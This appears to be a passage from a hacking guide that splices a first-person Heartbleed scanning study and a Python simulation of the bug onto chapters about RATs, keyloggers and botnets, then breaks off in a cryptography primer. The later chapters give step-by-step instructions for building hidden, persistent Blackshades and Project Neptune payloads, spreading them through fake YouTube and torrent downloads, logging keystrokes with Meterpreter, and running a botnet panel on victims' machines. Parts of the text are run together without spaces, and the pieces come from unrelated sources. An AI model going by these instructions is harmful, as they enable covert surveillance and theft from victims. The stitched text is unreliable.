In March 2014, researchers found a catastrophic vulnerability in OpenSSL, the cryptographic library used to secure connections in popular server products including Apache and Nginx. While OpenSSL has had several notable security issues during its 16-year history, this flaw, the Heartbleed vulnerability, was one of the most impactful. Heartbleed allows attackers to read sensitive memory from vulnerable servers, potentially including cryptographic keys, login credentials, and other private data. Exacerbating its severity, the bug is simple to understand and exploit.

Using extensive active scanning, I assessed who was vulnerable, characterizing Heartbleed's scope across popular HTTPS websites and the full IPv4 address space. I also surveyed the range of protocols and server products affected. I estimated that 24–55% of HTTPS servers in the Alexa Top 1 Million were initially vulnerable, including 44 of the Alexa Top 100. Two days after disclosure, I observed that 11% of HTTPS sites in the Alexa Top 1 Million remained vulnerable, as did 6% of all HTTPS servers in the public IPv4 address space. I found that vulnerable hosts were not randomly distributed, with more than 50% located in only 10 ASes that do not reflect the ASes with the most HTTPS hosts. In my scans of the IPv4 address space, I identified over 70 models of vulnerable embedded devices and software packages. I also observed that both SMTP+TLS and Tor were heavily affected; more than half of all Tor nodes were vulnerable in the days following disclosure.

In addition to patching, many sites replaced their TLS certificates due to the possibility that the private keys could have been leaked. I analyzed certificate replacement and found that while many of the most popular websites reacted quickly, less than a quarter of Alexa Top 1 Million sites replaced certificates in the week following disclosure. Even more worryingly, only 10% of the sites that were vulnerable 48 hours after disclosure replaced their certificates within the next month, and of those that did, 14% neglected to change the private key, gaining no protection from certificate replacement.

Heartbleed Vulnerability

The OpenSSL implementation of the Heartbeat Extension contained a vulnerability that allowed either end-point to read data following the payload message in its peer's memory by specifying a payload length larger than the amount of data in the HeartbeatRequest message. Because the payload length field is two bytes, the peer responds with up to 2^16 bytes (~64 KB) of memory. The bug itself is simple: the peer trusts the attacker-specified length of an attacker-controlled message.

The OpenSSL patch adds a bounds check that discards the Heartbeat Request message if the payload length field exceeds the length of the payload. However, while the bug is easy to conceptualize and the fix is straightforward, the potential impact of the bug is severe: it allows an attacker to read private memory, potentially including information transferred over the secure channel and cryptographic secrets.
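A model of the Heartbeat handling just described, as an added example (not OpenSSL's code and not from the page): the message layout follows RFC 6520 (one type byte, a 16-bit payload_length, the payload, then at least 16 bytes of padding), the vulnerable handler copies payload_length bytes from the payload position regardless of how much was actually sent, and the fixed handler applies the bounds check from the patch. The "process memory" and the secret that follows the record in it are constructed; it also reproduces the zero-length probe used by the scanning methodology below, which only a vulnerable implementation answers.

```python
# Added example (not from the page, not OpenSSL's code): Heartbeat handling in the
# vulnerable form beside the bounds-checked fix. Layout per RFC 6520; the process
# memory and the secret placed after the record are constructed.
import struct

HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16


def build_heartbeat(payload, claimed_length=None, padding=MIN_PADDING):
    """Encode a HeartbeatRequest. claimed_length lets us lie about the payload
    size, which is the whole exploit; padding=0 gives the scanner's minimal probe."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HB_REQUEST, length) + payload + b"\x00" * padding


def heartbeat_vulnerable(memory, offset):
    """Pre-patch behaviour: the record starts at memory[offset]; the handler trusts
    the attacker-supplied length and copies that many bytes from the payload
    position, reading past the record into whatever else is in memory."""
    record = memory[offset:]
    if len(record) < 3:
        return None
    hb_type, length = struct.unpack("!BH", record[:3])
    if hb_type != HB_REQUEST:
        return None
    payload_start = offset + 3
    leaked = memory[payload_start:payload_start + length]
    return struct.pack("!BH", HB_RESPONSE, length) + leaked + b"\x00" * MIN_PADDING


def heartbeat_fixed(memory, offset, record_length):
    """The patch: discard the request if the record cannot hold a payload at all,
    or if 1 + 2 + payload_length + 16 exceeds the record's real length."""
    record = memory[offset:offset + record_length]
    if record_length < 1 + 2 + MIN_PADDING:
        return None
    hb_type, length = struct.unpack("!BH", record[:3])
    if hb_type != HB_REQUEST or 1 + 2 + length + MIN_PADDING > record_length:
        return None
    return struct.pack("!BH", HB_RESPONSE, length) + record[3:3 + length] + b"\x00" * MIN_PADDING


# --- constructed memory: the received record followed by a secret ---------------
SECRET = b"-----BEGIN RSA PRIVATE KEY-----(constructed)"


def run(handler, record):
    memory = record + SECRET
    if handler is heartbeat_fixed:
        return handler(memory, 0, len(record))
    return handler(memory, 0)


def leaked(handler, claimed=64):
    """Bytes returned for an empty payload with an oversized length field."""
    resp = run(handler, build_heartbeat(b"", claimed))
    return None if resp is None else resp[3:-MIN_PADDING]


def probe_answered(handler):
    """The scanner's zero-length, zero-padding request: answered only by vulnerable code."""
    return run(handler, build_heartbeat(b"", 0, padding=0)) is not None


if __name__ == "__main__":
    print("vulnerable leaks secret:", SECRET in leaked(heartbeat_vulnerable))
    print("fixed answers oversized request:", leaked(heartbeat_fixed))
    print("probe answered (vulnerable, fixed):", probe_answered(heartbeat_vulnerable), probe_answered(heartbeat_fixed))
```

Note that the honest case still works after the fix: a request whose length field matches its payload is echoed back, and only the two malformed shapes (length larger than the record, or a record too short to carry the mandatory padding) are dropped.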

The Impact of Heartbleed

Heartbleed had the potential to affect any service that used OpenSSL to facilitate TLS connections, including popular web, mail, messaging, and database servers. To track its damage, I performed a regular vulnerability scan against the Alexa Top 1 Million domains and against 1% samples of the public, non-reserved IPv4 address space. I generated these samples using random selection with removal, per ZMap's existing randomization function. I excluded hosts and networks that previously requested removal from our daily HTTPS scans.

Scanning Methodology

I tested for the Heartbleed bug by modifying ZMap to send Heartbeat requests with no payload nor padding, and the length field set to zero. Per the RFC, these requests should be rejected. However, vulnerable versions of OpenSSL sent a response containing only padding, rather than simply dropping the request. The patched version of OpenSSL, as well as other popular libraries including GnuTLS, NSS, Bouncy Castle, PolarSSL, CyaSSL and MatrixSSL, correctly discard the request (or do not support the Heartbeat Extension).

I emphasize that this approach does not exploit the vulnerability or access any private memory; only random padding is sent back by the server. While it was later found that Heartbleed scanning caused HP Integrated Lights-Out (iLO) devices to crash, I received no reports of my scans disrupting these devices, likely because our approach did not exploit the vulnerability. We have publicly released our scanner at https://zmap.io.

Impact on Popular Websites

Determining which websites were initially vulnerable poses significant difficulties. Little attention was paid to the Heartbeat Extension prior to the vulnerability announcement, and many popular sites patched the vulnerability within hours of the disclosure. Codenomicon, one of the groups that discovered Heartbleed, speculated that 66% of HTTPS sites were vulnerable. However, this number represented the Apache and Nginx market share and may well be an overestimate, because some operators may have disabled the extension, deployed dedicated SSL endpoints, or used older, non-vulnerable versions of OpenSSL.

Top 100 Websites

All of the Alexa Top 100 websites were patched within 48 hours of disclosure, prior to the start of our scans. To document the impact on these websites, we aggregated press releases, others' targeted scans, and quotes provided to Mashable, a news site that hosted one of the popular lists of sites for which users should change their passwords due to possible exposure via Heartbleed.

Al-Bassam completed a vulnerability scan of the Alexa Top 10,000 domains on April 8, 2014 at 16:00 UTC (22 hours after the vulnerability disclosure). His scan found 630 vulnerable sites, 3,687 supporting HTTPS but not vulnerable, and 5,683 not supporting HTTPS. Several prominent sites, including Yahoo, Imgur, Stack Overflow, Flickr, Sogou, OkCupid, and DuckDuckGo, were found vulnerable. Table 3 lists the vulnerability status of the top 30 HTTPS-enabled sites in the US.

Chapter Three: Remote Administration Tool

What is a RAT?

A remote administration tool (RAT) is a piece of software that allows a remote "operator" to control a system as if he had physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity.

Malicious RAT software is typically installed without the victim's knowledge, often as the payload of a Trojan horse, and will try to hide its operation from the victim. Many trojans and backdoors now have remote administration capabilities allowing an individual to control the victim's computer. Many times, a file (often called a client or stub) must be opened on the victim's computer before the hacker can have access to it. These are generally sent through email, P2P file sharing software, and internet downloads. They are usually disguised as a legitimate program or file. Many clients/stubs will display a fake error message when opened, to make it seem like it didn't open. Some will also disable antivirus and firewall software.

RAT trojans can generally do the following:

● Block the mouse and keyboard
● Change the desktop wallpaper
● Download, upload, delete and rename files
● Destroy hardware by overclocking
● Drop viruses and worms
● Edit the registry
● Format drives
● Steal passwords and credit card numbers
● Alter your web browser's home page
● Hide desktop icons, taskbar and files
● Silently install applications
● Log keystrokes (keystroke capture software)
● Open the CD-ROM tray
● Overload the RAM/ROM drive
● Send message boxes
● Play sounds
● Control the mouse or keyboard
● And much more!

A well-designed RAT will allow the operator to do anything that they could do with physical access to the machine. Some RAT trojans are pranks that are most likely being controlled by a friend or enemy on April Fool's Day or a holiday. Prank RATs are generally not harmful, and won't log keystrokes or store information about the system on the computer. They usually do disruptive things like flip the screen upside-down, open the CD-ROM tray, or swap mouse buttons.

HowtosetupRAT

DNS

Nowyouneedtodecide,ifyouwanttouseaDNSornot.IwouldrecommendaDNS,becauseit’ssaferthanwithoutone!Ifyoudon’twanttouseit,youcanskipthispart.Iwouldn’trecommendusingNo-Ip,becauseitisn’tsafeanymore.IcanrecommendFreeDNSandDuckDNS.

FirstofallweneedtocreateanAccountwhichcanbedonebynavigatingtothislink:https://freedns.afraid.org/signup/.Afteryousignedupyoucanstartcreatingyoursubdomain.Justclickon“Subdomains”.Thenyouneedtoclickon“Addasubdomain”.Nowyoucancreateyoursubdomain.

VPN

AttheVPNpartyouneedtodecide(again)ifyouwanttouseaVPNbehindyourDNSornot.Ifnot,youcanskipthispart.IcanrecommendtouseaVPN,becauseit“hides”yourrealIP.

PortForwarding

Step1:Openupacommandpromptandenter‘ipconfig’withoutqoutesandlookforthe label Default Gateway, and it should look something like 192.168.1.1 or192.168.1.254.

Step2:EnteritinyouraddressbarinyourbrowserandsignintoyourRouter.

Step3:Gototheport-forwardingpagewhichmaybeunderyourAdvancedSettingsorApplicationsettings.

Step 4: Once you’re there, add two open ports for your computer ip which is onipconfiglabeledasipv4.MakesureyouopenitasbothTCPandUDP.Nowyou’vesuccessfully opened your port. Don’t do anything yet. Because you need to followotherstepsinorderforyourporttobeuseful.

Setting it up finally

Now here’s the thing. Every RAT has its own builder. Most of the procedure is the same, but there may still be some options that might confuse you. Don’t worry, it’s good to experiment with these, but before you start to spread your server, be sure that it’s working properly. Let’s start with my personal favorite, Blackshades.

Step 1: Open client.exe to launch Blackshades NET and then you are automatically logged into Blackshades Client.

Step 2: Now click the “Create Server” tab, right click in the “profiles pane”, select “Create new”, enter a profile name for it and click OK.

Step 3: Type your FreeDNS or DuckDNS address into the “IP/DNS” area.

Step 4: Type the ports that you forwarded. First port as “Port”, second port as “Transfer Port”.

Step 5: Name anything as your “Server ID”; it’s just to identify the victim. You don’t want to disturb the “Encryption Key”. (Note: the encryption key feature has been disabled in the latest versions.)

Step 6: Enter the “Filename” for the server that would be created. You can use the “Hide File” feature if you want a silent execution of the server file.

Step 7: Select the “Install path” for the server to get installed, either “Application data” or “Temp directory”.

Step 8: Select the “Install mode” for the server, whether to Install, Melt, or Protect Process.

Step 9: You can set the “Delay” time for the connection between your client and the server here.

Step 10: Enter “HKCU” as something which appears like a system name, for example WinNT, and use the “Startup” feature only if you want the server to run each time the computer is restarted.

Step 11: Generate “ActiveX” if you had selected the “Startup” feature.

Step 12: Generate a “Mutex” for the server by clicking “Generate”.

Step 13: Click “Infect USB” if you want to infect the victim’s USB with your virus, and select “Compress with UPX” if you want to compress your server size. Select “Change Icon” if you want to change the icon. Select “Clone File Information” if you want to clone some file’s information.

Step 14: Click “Save” to save your profile information.

Step 15: Click “Build” to create your server.

And that’s it!

How is it being distributed?

These are not entirely all the methods black hat hackers are using to spread their malicious files, but this is just to help inform you about the basics of how they spread them.

YouTube: In my opinion the most famous and easiest method is YouTube. This is mainly done to target a special group, like people with special accounts. Anyway, here’s how it’s done.

1. Go to youtube.com and register an account if not already done.

2. Let’s say we’re going to target Steam users. Search for “steam hacks” or anything you like, and download the video.

3. Now all you need is to upload the video back, but in the description you have to ensure the download link is your original server. Chances are that most of the time someone will download and run your malicious file on their computer without even knowing.

Torrents: Yup, you heard it right. Torrent sites are the number-one spreading websites for hackers. Most of the .exe keygens/cracks you download are probably bound with malicious files, so it’s better to double check these files. Here’s how they do it.

1. Download a torrent program like BitTorrent here: http://www.bittorrent.com.

2. Install BitTorrent if not already done.

3. Go to File -> Create new Torrent.

4. Look for your file and select it. Now a new torrent with your file will be created.

5. Go to a famous torrent site like Piratebay.org.

6. Upload your new torrent to the site with a detailed description.

Java Drive-by: A Java Drive-By or Java applet is considered one of the most popular and successful methods for compromising a system. It’s popular because it’s very easy to set up and it affects all platforms. A Java Drive-By is a Java applet that is coded in Java and is put on a website. Once the victim views the cloned website a pop-up box will appear saying that his Java version is out of date, “click run to update”. Usually the victim clicks, thinking it is going to update his Java, but in the background it will download a program off the Internet. This program can be a keylogger or a virus, etc.

Chapter Four: Keylogger

What is a Keylogger?

Well, if you have absolutely no idea about computers then you might not be familiar with the term “keylogger”, but if you do then you might have come across stories of the great keylogger. Believe me, it’s pretty useful if you know how to use it. A keylogger is a type of surveillance software (considered to be either software or spyware) that has the capability to record every keystroke you make to a log file, usually encrypted. A keylogger recorder can record instant messages, e-mail, and any information you type at any time using your keyboard. The log file created by the keylogger can then be sent to a specified receiver. Some keylogger programs will also record any e-mail addresses you use and website URLs you visit.

Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware, allowing your information to be transmitted to an unknown third party.

Keystroke logging

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. It has uses in the study of human–computer interaction. There are numerous keylogging methods, ranging from hardware- and software-based approaches to acoustic analysis.

(Figure: a keylogger example of a screen capture, which holds potentially confidential and private information, together with the corresponding keylogger text result.)

Keylogger Applications

Software-based keyloggers

These are computer programs designed to work on the target computer’s software. Keyloggers are used in IT organizations to troubleshoot technical problems with computers and business networks. Other legal uses include family or business people using them to monitor the network usage without their users’ direct knowledge. However, malicious individuals may use keyloggers on public computers to steal passwords or credit card information.

From a technical perspective there are several categories:

● Hypervisor-based: The keylogger can theoretically reside in a malware hypervisor running underneath the operating system, which remains untouched. It effectively becomes a virtual machine. Blue Pill is a conceptual example.

● Kernel-based: A program on the machine obtains root access to hide itself in the OS and starts intercepting keystrokes that pass through the kernel. This method is difficult both to write and to combat. Such keyloggers reside at the kernel level and are thus difficult to detect, especially for user-mode applications which don’t have root access. They are frequently implemented as rootkits that subvert the operating system kernel and gain unauthorized access to the hardware, making them very powerful. A keylogger using this method can act as a keyboard device driver, for example, and thus gain access to any information typed on the keyboard as it goes to the operating system.

● API-based: These keyloggers hook keyboard APIs inside a running application. The keylogger registers for keystroke events, as if it was a normal piece of the application instead of malware. The keylogger receives an event each time the user presses or releases a key. The keylogger simply records it.

● Form grabbing based: Form grabbing-based keyloggers log web form submissions by recording the web browser’s on-submit events. These happen when the user finishes filling in a form and submits it, usually by clicking a button or hitting Enter. This records form data before it is passed over the Internet.

● Memory injection based: Memory Injection (MitB)-based keyloggers alter memory tables associated with the browser and other system functions to perform their logging functions. By patching the memory tables or injecting directly into memory, this technique can be used by malware authors who are looking to bypass Windows UAC (User Account Control). The Zeus and SpyEye Trojans use this method exclusively. Non-Windows systems have analogous protection mechanisms that need to be thwarted somehow by the keylogger.

● Packet analyzers: This involves capturing network traffic associated with HTTP POST events to retrieve unencrypted passwords. This is made more difficult when connecting via HTTPS, which is one of the reasons HTTPS was invented.

● Remote access software keyloggers: These are local software keyloggers with an added feature that allows access to the locally recorded data from a remote location. Remote communication may be achieved using one of these methods:

1. Data is uploaded to a website, database or an FTP server.

2. Data is periodically emailed to a pre-defined email address.

3. Data is wirelessly transmitted by means of an attached hardware system.

4. The software enables a remote login to the local machine from the Internet or the local network, for data logs stored on the target machine to be accessed.

Most of these aren’t stopped by HTTPS encryption because that only protects data in transit between computers; this is a threat in your own computer - the one connected to the keyboard.

Hardware-based keyloggers

Hardware-based keyloggers do not depend upon any software being installed, as they exist at a hardware level in a computer system.

● Firmware-based: BIOS-level firmware that handles keyboard events can be modified to record these events as they are processed. Physical and/or root-level access is required to the machine, and the software loaded into the BIOS needs to be created for the specific hardware that it will be running on.

● Keyboard hardware: Hardware keyloggers are used for keystroke logging by means of a hardware circuit that is attached somewhere in between the computer keyboard and the computer, typically in line with the keyboard’s cable connector. There are also USB connector based hardware keyloggers as well as ones for laptop computers (the Mini-PCI card plugs into the expansion slot of a laptop). Stealthier implementations can be installed or built into standard keyboards, so that no device is visible on the external cable. Both types log all keyboard activity to their internal memory, which can be subsequently accessed, for example, by typing in a secret key sequence. A hardware keylogger has an advantage over a software solution: it is not dependent on being installed on the target computer’s operating system and therefore will not interfere with any program running on the target machine or be detected by any software. However, its physical presence may be detected if, for example, it is installed outside the case as an inline device between the computer and the keyboard. Some of these implementations have the ability to be controlled and monitored remotely by means of a wireless communication standard.

● Wireless keyboard sniffers: These passive sniffers collect packets of data being transferred between a wireless keyboard and its receiver. As encryption may be used to secure the wireless communications between the two devices, this may need to be cracked beforehand if the transmissions are to be read.

● Keyboard overlays: Criminals have been known to use keyboard overlays on ATMs to capture people’s PINs. Each keypress is registered by the keyboard of the ATM as well as the criminal’s keypad that is placed over it. The device is designed to look like an integrated part of the machine so that bank customers are unaware of its presence.

● Acoustic keyloggers: Acoustic cryptanalysis can be used to monitor the sound created by someone typing on a computer. Each key on the keyboard makes a subtly different acoustic signature when struck. It is then possible to identify which keystroke signature relates to which keyboard character via statistical methods such as frequency analysis. The repetition frequency of similar acoustic keystroke signatures, the timings between different keyboard strokes and other context information such as the probable language in which the user is writing are used in this analysis to map sounds to letters.[14] A fairly long recording (1000 or more keystrokes) is required so that a big enough sample is collected.

● Electromagnetic emissions: It is possible to capture the electromagnetic emissions of a wired keyboard from up to 20 metres (66 ft) away, without being physically wired to it. In 2009, Swiss researchers tested 11 different USB, PS/2 and laptop keyboards in a semi-anechoic chamber and found them all vulnerable, primarily because of the prohibitive cost of adding shielding during manufacture. The researchers used a wide-band receiver to tune into the specific frequency of the emissions radiated from the keyboards.

● Optical surveillance: Optical surveillance, while not a keylogger in the classical sense, is nonetheless an approach that can be used to capture passwords or PINs. A strategically placed camera, such as a hidden surveillance camera at an ATM, can allow a criminal to watch a PIN or password being entered.

● Physical evidence: For a keypad that is used only to enter a security code, the keys which are in actual use will have evidence of use from many fingerprints. A passcode of four digits, if the four digits in question are known, is reduced from 10,000 possibilities to just 24 possibilities (10^4 versus 4!, the factorial of 4). These could then be used on separate occasions for a manual “brute force attack”.

● Smartphone sensors: Researchers have demonstrated that it is possible to capture the keystrokes of nearby computer keyboards using only the commodity accelerometer found in smartphones. The attack is made possible by placing a smartphone near a keyboard on the same desk. The smartphone’s accelerometer can then detect the vibrations created by typing on the keyboard, and then translate this raw accelerometer signal into readable sentences with as much as 80 percent accuracy.

How to set up a Keylogger

For this we will be using the famous Project Neptune keylogger. Project Neptune is known to be one of the easiest keyloggers for Microsoft Windows operating systems. This software is completely undetectable once installed, even to antiviruses. Another useful feature of this software is that it can send you the logs (recorded keystrokes) to your e-mail address. All this will happen and your victim would not know about it.

Again, I am not responsible for any damage you cause; this is for educational purposes only.

Step 1: Download the software from its official website and save it on your disk.

Step 2: Once it’s downloaded, extract the folder to wherever you want and open it up. Then open ProjectNeptune.exe.

Step 3: Configure the software. Open the software and come to the “Keystrokes” menu. Now I’m using email to receive the logs; you can use FTP if you want to.

Step 4: After configuring Keystrokes click on System Wide. Once you’re in the System Wide menu, check the required options as per your requirements. It would be a good idea to keep the level Low or Non-existent.

Step 5: Installation Menu: This menu will define the behavior of the software. It would be a good idea to set the installation directory to system folders. You can also bind the program to a file; we will skip this option.

Step 6: Skip to the Server Creation menu. In the server settings I would recommend putting something here if you want to make it less suspicious. Put something that would make it look like the original program. Don’t check “Copy File’s Creation Date” or “Use File Icon” unless you have the premium version. In the file pumping section I would increase it by 1000+ kb to make it less suspicious. In the server generation tab, where it says “Mutual Exclusion (Mutex) String”, hit the refresh button after that. Where it says automated cure password you can use the refresh button or you can type in a password of your choice. Then, keep the process name as “iexplorer.exe”. Then hit the Generate New Server button and it will create a server for you.

Step 7: All set. Now all you need to do is to run it on your victim’s computer.

Remotely installing a Keylogger using Meterpreter

This can be done only once you’ve successfully installed Metasploit’s powerful listener/rootkit on the target system. It is explained in Chapter:, Section:.

Step 1: Migrate the Meterpreter

Before we start our keylogger, we need to migrate the Meterpreter to the application or process we want to log the keystrokes from. Let’s check to see what processes are running on the victim system by typing: meterpreter > ps

Notice in the screenshot that we have a listing of every process running on the victim system. We can see about 1/3 of the way down the process listing, with a Process ID (PID) of 912, that the Notepad application is open and running.

Let’s migrate to that process and capture any keystrokes entered there. Type: meterpreter > migrate 912. You can see from the screenshot that Meterpreter responds that we have migrated successfully.

Step 2: Start the Keylogger

Now that we have migrated the Meterpreter to Notepad, we can embed the keylogger. Metasploit’s Meterpreter has a built-in software keylogger called keyscan. To start it on the victim system, just type: meterpreter > keyscan_start. With this command, Meterpreter will now start logging every keystroke entered into the Notepad application.

Step 3: Recover the Keystrokes

Now, let’s go back to our system with Meterpreter running on Metasploit. We can now dump all of the keystrokes that were entered on the target’s computer. We simply type: meterpreter > keyscan_dump

Chapter Five: Botnets and IRC Bots

Understanding Botnets and IRC Bots

A botnet is a number of Internet-connected computers communicating with other similar machines in an effort to complete repetitive tasks and objectives. This can be as mundane as keeping control of an Internet Relay Chat (IRC) channel, or it could be used to send spam email or participate in distributed denial-of-service attacks. The word botnet is a combination of the words robot and network. The term is usually used with a negative or malicious connotation.

Computers that are co-opted to serve in a zombie army are often those whose owners fail to provide effective firewalls and other safeguards. An increasing number of home users have high speed connections for computers that may be inadequately protected. A zombie or bot is often created through an Internet port that has been left open and through which a small Trojan horse program can be left for future activation. At a certain time, the zombie army “controller” can unleash the effects of the army by sending a single command, possibly from an Internet Relay Chat (IRC) site.

The computers that form a botnet can be programmed to redirect transmissions to a specific computer, such as a Web site that can be closed down by having to handle too much traffic - a distributed denial-of-service (DDoS) attack - or, in the case of spam distribution, to many computers. The motivation for a zombie master who creates a DDoS attack may be to cripple a competitor. The motivation for a zombie master sending spam is in the money to be made. Both of them rely on unprotected computers that can be turned into zombies.

Types of Botnets

Legal botnets

The term botnet is widely used when several IRC bots have been linked and may possibly set channel modes on other bots and users while keeping IRC channels free from unwanted users. This is where the term is originally from, since the first illegal botnets were similar to legal botnets. A common bot used to set up botnets on IRC is eggdrop.

Illegal botnets

Botnets sometimes compromise computers whose security defenses have been breached and control conceded to a third party. Each such compromised device, known as a “bot”, is created when a computer is penetrated by software from a malware (malicious software) distribution. However, it could also be someone (or a spider) that hacks into a computer. The controller of a botnet is able to direct the activities of these compromised computers through communication channels formed by standards-based network protocols such as IRC and Hypertext Transfer Protocol (HTTP). Botnets are increasingly rented out by cybercriminals as commodities for a variety of purposes.

Formation of Botnet/IRC Bots

This example illustrates how a botnet is created and used to send email spam.

● A botnet operator sends out viruses or worms, infecting ordinary users’ computers, whose payload is a malicious application—the bot.

● The bot on the infected PC logs into a particular C&C server.

● A spammer purchases the services of the botnet from the operator.

● The spammer provides the spam messages to the operator, who instructs the compromised machines via the control panel on the web server, causing them to send out spam messages.

Botnets can be exploited for various other purposes, including denial-of-service attacks, creation or misuse of SMTP mail relays for spam, click fraud, mining bitcoins, spamdexing, and the theft of application serial numbers, login IDs, and financial information such as credit card numbers.

The botnet controller community features a constant and continuous struggle over who has the most bots, the highest overall bandwidth, and the most “high-quality” infected machines, like university, corporate, and even government machines.

Types of attacks

1. In distributed denial-of-service attacks, multiple systems submit as many requests as possible to a single Internet computer or service, overloading it and preventing it from servicing legitimate requests. An example is an attack on a victim’s phone number. The victim is bombarded with phone calls by the bots, attempting to connect to the Internet.

2. Adware advertises a commercial offering actively and without the user’s permission or awareness, for example by replacing banner ads on web pages with those of another advertiser.

3. Spyware is software which sends information to its creators about a user’s activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential corporate information. Several targeted attacks on large corporations aimed to steal sensitive information, such as the Aurora botnet.

4. E-mail spam consists of e-mail messages disguised as messages from people, but which are either advertising, annoying, or malicious.

5. Click fraud occurs when the user’s computer visits websites without the user’s awareness to create false web traffic for personal or commercial gain.

6. Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.

7. Brute-forcing remote machines’ services such as FTP, SMTP and SSH.

8. Worms. The botnet focuses on recruiting other hosts.

9. Scareware is software that is marketed by creating fear in users. Once installed, it can install malware and recruit the host into a botnet. For example, users can be induced to buy a rogue anti-virus to regain access to their computer.

10. Exploiting systems by observing users playing online games such as poker and seeing the players’ cards.

How to set up a Botnet

Before you start to set up your first botnet, there are some things you need to know:

● A botnet is a panel that can keep many computers connected to it.

● The computers connected to it are called bots.

● The bots will be under your command, so you will be able to command them to do things and they will do it.

● You will need a website plus hosting.

Alright, let’s start. For this tutorial I will be using a simple botnet called “Botnet”. It’s free, so don’t worry. There are more advanced and stable botnets available out there, but they cost, depending on their functionality.

Step 1: Extract the botnet files and then open up the folder “Panel”. Find config.php and edit it.

Step 2: Now go to your web host and add a SQL DB and user. When you are done with that, upload the .sql from the folder “SQL” to your SQL DB.

Step 3: Edit the SQL connection info in config.php. Save when finished.

Step 4: Upload everything in the folder “Panel” to your web host. Now close the folder, etc.

Step 5: Go to your website. Log in to your botnet with the password in config.php.

Step 6: Go back to the folder “Botnet” and open up Build.exe. Then type in your domain name (e.g. www.site.com) and the path. Build the file and run it on your target’s computer. If it shows up in the web panel, then congratulations. Your botnet is fully functional.

How to set up an IRC Botnet?

This will be a little complicated if you’re new to botnets and IRC, but if you follow these steps properly it will be no problem.

Requirements: You need a CentOS 5 or 6 Linux VPS [32 bit or 64 bit]. You may buy an offshore Linux VPS to avoid quick suspension.

Step 1: First of all, you need an SSH client like PuTTY. Google “Putty” and you will find it pretty easily. It’s free as well. Once you have downloaded it, open PuTTY, enter the VPS IP in the host name or IP address field and hit Open.

Step 2: Now type root, then press Enter. Now enter the root password you received from your VPS company. Remember you can’t see anything while typing the password, so write it properly and hit Enter; you should be able to log in. Now just copy and paste the commands as follows:

yum update, hit Enter, and then type again: yum install gcc gcc-c++ kernel-devel

● Now type: wget https://www.unrealircd.org/downloads/Unreal3.2.10.4.tar.gz

● Now type: tar zxvf Unreal3.2.10.4.tar.gz

● Now type: cd Unreal3.2.10.4

● Now type: chmod 777 Config

Now do as follows:

Type: ./Config, hit Enter. Just hold Enter through all this readme. Then it will start asking questions; you don’t need to change anything except for one value.

● How many file descriptors can the IRCd use? Enter 12000

● Now type: make

Now type: yum install nano

Now type: nano /usr/include/bits/typesizes.h

● Change #define __FD_SETSIZE 1024 to this: #define __FD_SETSIZE 12000

● Now hold Ctrl and press X. Type Y and press Enter. You should be back to the console window now.

● Now type: nano /etc/security/limits.conf

Now that we are in there, scroll all the way down by using the arrow keys.

● Once you are down there, type the two lines root hard nofile 12000 and root soft nofile 12000

● Now hold Ctrl and press X. Type Y and press Enter.

● Now you need to exit PuTTY and sign back in to your root account.

● Now type ulimit -n. If all goes well then you will see the number you put in the limits.conf file.

● Upload the unrealircd.conf file, and type ./unreal start

● Download unrealircd.conf from http://ge.tt/1VuH1l72/v/0

● Now open the .conf file using Notepad or Notepad++.

● Now hold Ctrl and press F. Type AV and press Enter. You may change it to anything you like. And again do the same and type anything you like. And change it to anything for your oper password. Now save it and upload it to your VPS inside unreal. Do as follows.

● First download WinSCP. You can download it from: http://winscp.net/download/winscp556setup.exe

● Now log in to your root account using WinSCP as follows:

● Open the Unreal3.2.10.4 folder and transfer the edited unrealircd.conf. We are almost done setting up the IRCd server.

● Now close WinSCP and type in your PuTTY console: cd Unreal3.2.10.4

● Now type: ./unreal start. That’s all.

Now your IRCd server is ready to use with any IRC botnet. Download any IRC client like mIRC to connect with your server.

Chapter Six: Cryptography, Encryption, and Decryption

Understanding Cryptography

Cryptography is where security engineering meets mathematics. It provides us with the tools that underlie most modern security protocols. It is probably the key enabling technology for protecting distributed systems, yet it is surprisingly hard to do right. Cryptography has often been used to protect the wrong things, or used to protect them in the wrong way. We’ll see plenty more examples when we start looking in detail at real applications.

Unfortunately, the computer security and cryptology communities have drifted apart over the last 20 years. Security people don’t always understand the available crypto tools, and crypto people don’t always understand the real-world problems. There are a number of reasons for this, such as different professional backgrounds (computer science or mathematics) and different research funding (governments have tried to promote computer security research while suppressing cryptography).

This chapter is aimed at people without a training in cryptology; cryptologists will find little in it which they don’t already know. As I only have a few dozen pages, and a proper exposition of modern cryptography would run into thousands, I won’t go into much of the mathematics (there are plenty of books that do that). I’ll just explain the basic intuitions and constructions. If you have to use cryptography in anything resembling a novel way, then I strongly recommend that you read a lot more about it.

Computer security people often ask for non-mathematical definitions of cryptographic terms. The basic terminology is that cryptography refers to the science and art of designing ciphers; cryptanalysis to the science and art of breaking them; while cryptology, often shortened to just crypto, is the study of both. The input to an encryption process is commonly called the plaintext, and the output the ciphertext. Thereafter, things get somewhat more complicated. There are a number of cryptographic primitives—basic building blocks, such as block ciphers, stream ciphers, and hash functions. Block ciphers may either have one key for both encryption and decryption, in which case they’re called shared key (also secret key or symmetric), or have separate keys for encryption and decryption, in which case they’re called public key or asymmetric. A digital signature scheme is a special type of asymmetric crypto primitive. In the rest of this chapter, I will first give some simple historical examples to illustrate the basic concepts. Finally, I’ll show how some of the more important cryptographic algorithms actually work, and how they can be used to protect data.

Historical Background (Cryptography)

Suetonius tells us that Julius Caesar enciphered his dispatches by writing D for A, E for B and so on. When Augustus Caesar ascended the throne, he changed the imperial cipher system so that C was now written for A, D for B, and so on. In modern terminology, we would say that he changed the key from D to C. The Arabs generalized this idea to the mono-alphabetic substitution, in which a keyword is used to permute the cipher alphabet. We will write the plaintext in lowercase letters, and the ciphertext in uppercase, as in this example:

CYAN RWSGKFR AN AH RHTFANY MSOYRMOYSHSMSEACNCMAKO

